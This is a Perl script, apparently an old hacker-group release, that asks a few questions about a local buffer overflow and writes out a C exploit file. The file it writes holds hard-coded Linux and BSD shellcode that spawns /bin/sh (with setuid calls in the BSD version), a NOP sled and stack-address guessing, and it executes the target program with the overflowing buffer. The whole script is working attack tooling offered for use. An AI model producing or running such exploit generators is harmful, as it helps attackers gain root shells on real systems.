#!/usr/bin/perl # # [ElectronicSouls] # # Hrm.... well this is quiet simple, this little proggie of mines lets the user submit # information thru short questions about there local buffer overflow bug and with that, # the program generates a .c proof of concept exploit code for it. # Enjoy! # # -BuRn-X # # print "+++++++++++++++++++++++++++++++++++++++\n"; print "+ [ElectronicSouls] +\n"; print "+ Presents +\n"; print "+ -+-+-+-+- +\n"; print "+ Simple Bof Coder +\n"; print "+ Linux && BSD +\n"; print "+ (Public Version) +\n"; print "+ By BuRn-X +\n"; print "+++++++++++++++++++++++++++++++++++++++\n"; print "Enter the Program Location(Ex. /bin/passwd):\n"; $proglocation=; chomp $proglocation; print "Enter the Program Name(Ex. passwd):\n"; $progname=; chomp $progname; print "Enter the buffer size:\n"; $buffsize=; chomp $buffsize; print "Please the Offset(Default = 0, leave blank for default):\n"; $offsetsize=; chomp $offsetsize; print "Enter the Align(Default = 0, leave blank for 0):\n"; $myalign=; chomp $myalign; print "Any Option for appplication(Ex. -m), Leave blank for none:\n"; $exoption=; chomp $exoption; print "What type of OS(Linux=linux, BSD=bsd):\n"; $typeos=; chomp $typeos; open(esouls, ">>exploit.c"); print esouls " \#include \#include \#include \#define BSIZE $buffsize \n"; if ($myalign eq "") { print esouls" \#define ALIGN 0 \n"; } else { print esouls" \#define ALIGN $myalign \n"; } if ($offsetsize eq "") { print esouls" \#define OFFSET 0 //offset \n"; } else { print esouls" \#define OFFSET $offsetsize //offset \n"; } print esouls" unsigned char esshellcode[] =\n"; if ( $typeos eq "linux" ) { print esouls "\"\\xeb\\x16\\x31\\xdb\\x31\\xc9\\xf7\\xe1\"\n"; print esouls "\"\\x5b\\xb0\\x0b\\x88\\x53\\x07\\x52\\x53\"\n"; print esouls "\"\\x89\\xe1\\xcd\\x80\\xb0\\x01\\xcd\\x80\"\n"; print esouls "\"\\xe8\\xe5\\xff\\xff\\xff/bin/sh\";\n"; } if ( $typeos eq "bsd" ) { print esouls "\"\\x31\\xdb\\xb8\\xb7\\xaa\\xaa\\xaa\\x25\\xb7\\x55\\x55\\x55\\x53\\x53\\xcd\\x80\"\n"; print esouls "\"\\x31\\xdb\\xb8\\x17\\xaa\\xaa\\xaa\\x25\\x17\\x55\\x55\\x55\\x53\\x53\\xcd\\x80\"\n"; print esouls "\"\\xeb\\x23\\x5e\\x8d\\x1e\\x89\\x5e\\x0b\\x31\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\"\n"; print esouls "\"\\x89\\x56\\x14\\x88\\x56\\x19\\x31\\xc0\\xb0\\x3b\\x8d\\x4e\\x0b\\x89\\xca\\x52\"\n"; print esouls "\"\\x51\\x53\\x50\\xeb\\x18\\xe8\\xd8\\xff\\xff\\xff/bin/sh\\x01\\x01\\x01\\x01\"\n"; print esouls "\"\\x02\\x02\\x02\\x02\\x03\\x03\\x03\\x03\\x9a\\x04\\x04\\x04\\x04\\x07\\x04\";\n"; } print esouls " unsigned long get_sp(void) { __asm__(\"movl %esp, %eax\"); } int main(\int argc, char **argv) { char *buffer; int i; int bsize = BSIZE; int align = ALIGN; int offset = OFFSET; unsigned long addr; \if(argc > 1) bsize = atoi(argv[1]); buffer = (char *)malloc(bsize); bzero(buffer, bsize); memset(buffer, 0x90, bsize); addr = get_sp() - offset; *(unsigned long *)&buffer[bsize - 4] = addr; *(unsigned long *)&buffer[bsize - 8] = addr; memcpy(buffer + bsize - 8 - align - strlen(esshellcode), esshellcode, strlen(esshellcode));\n"; if ( $exoption eq "" ) { print esouls "execl(\"$proglocation\", \"$progname\", buffer, NULL);\n"; } else { print esouls "execl(\"$proglocation\", \"$progname\", \"$exoption\", buffer, NULL); \n"; } close(esouls);